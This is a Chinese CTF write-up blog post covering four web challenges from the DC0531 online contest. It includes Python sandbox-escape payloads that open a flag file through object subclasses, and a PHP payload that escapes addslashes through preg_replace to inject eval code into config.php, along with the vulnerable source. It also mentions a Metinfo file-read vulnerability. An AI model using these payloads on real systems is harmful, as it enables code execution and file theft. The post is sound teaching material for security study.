美文网首页信息安全CTF
[DC0531] CTF 线上赛 web

[DC0531] CTF 线上赛 web

作者: ckj123 | 来源:发表于2018-06-19 00:43 被阅读2次

    这个端午好像就放了这么一个比赛
    之前我还以为很简单。。意外
    发现自己还是挺菜

    web1

    这道题首先是让你关注微信公众号,我还以为关注了就可以

    意外的是他居然要做题!
    进去是这样的

    选择武器真滴刺激
    主要的就是射击,fuzz一下就是

    要s:ip 我就s:
    找辉神问了一下怎么样可以收到ping包——用tcpdump
    sudo tcpdump ip proto \\icmp
    

    网上找了一下使用tcpdump
    https://www.cnblogs.com/f-ck-need-u/p/7064286.html
    一直不行=。=觉得关题目了
    找了腹黑要了payload

    tcpdump -i venet0:0 src 139.198.3.171 -q -XX -nn -vvv
    

    给我的payload里面有网址=。=
    139.198.3.171进去之后发现有.git泄露
    关题目了呜呜呜

    web2

    首先是www.zip泄露
    这道题是Metinfo 6.0.0的新漏洞吧
    总不可能找0day
    上网搜索一下只在bugscan中找到一个6月5号的任意文件读取
    看着告诉了我们路径我觉得没错了
    上网再查一番
    http://badcode.cc/2018/05/26/Metinfo-6-0-0-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/
    有这一份5-26号的!按着这个做就行
    我做的时候环境关了给一份li4n0师傅的payload

    web3

    python的日沙箱
    http://www.360zhijia.com/360anquanke/178589.html
    魔法函数!就可以了

    ().__class__.__bases__[0].__subclasses__()
    

    但是没有任何东西

    0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")
    

    有东西
    用for循环读取一下

    [i.read()for(i)in[0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")]]
    

    这样就好啦

    web4

    这题又给源码了
    git泄露
    payload

    option=dfgh\';eval($_GET[c]);//
    
    <?php
    if(!isset($_GET['option'])) die();
    $str = addslashes($_GET['option']);
    $file = file_get_contents('./config.php');
    $file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);
    file_put_contents('./config.php', $file);
    

    做的时候我在本地搭了环境在线试的发现并没有过滤\(着急做题就没仔细想)
    但是addslashes是过滤了\的呀
    估计就是那个正则表达式的问题吧
    原来是因为preg_replace的问题使得\又被转义了一次
    所以单引号逃出来了

    就可以了在config.php中执行任意命令了
    最难的是要跑脚本了,一直上传自己的命令,跟别人抢
    最后cat flag.php时候bp中不行
    我是直接用firefox的

    相关文章

      网友评论

        本文标题:[DC0531] CTF 线上赛 web

        本文链接:https://www.haomeiwen.com/subject/oqdoeftx.html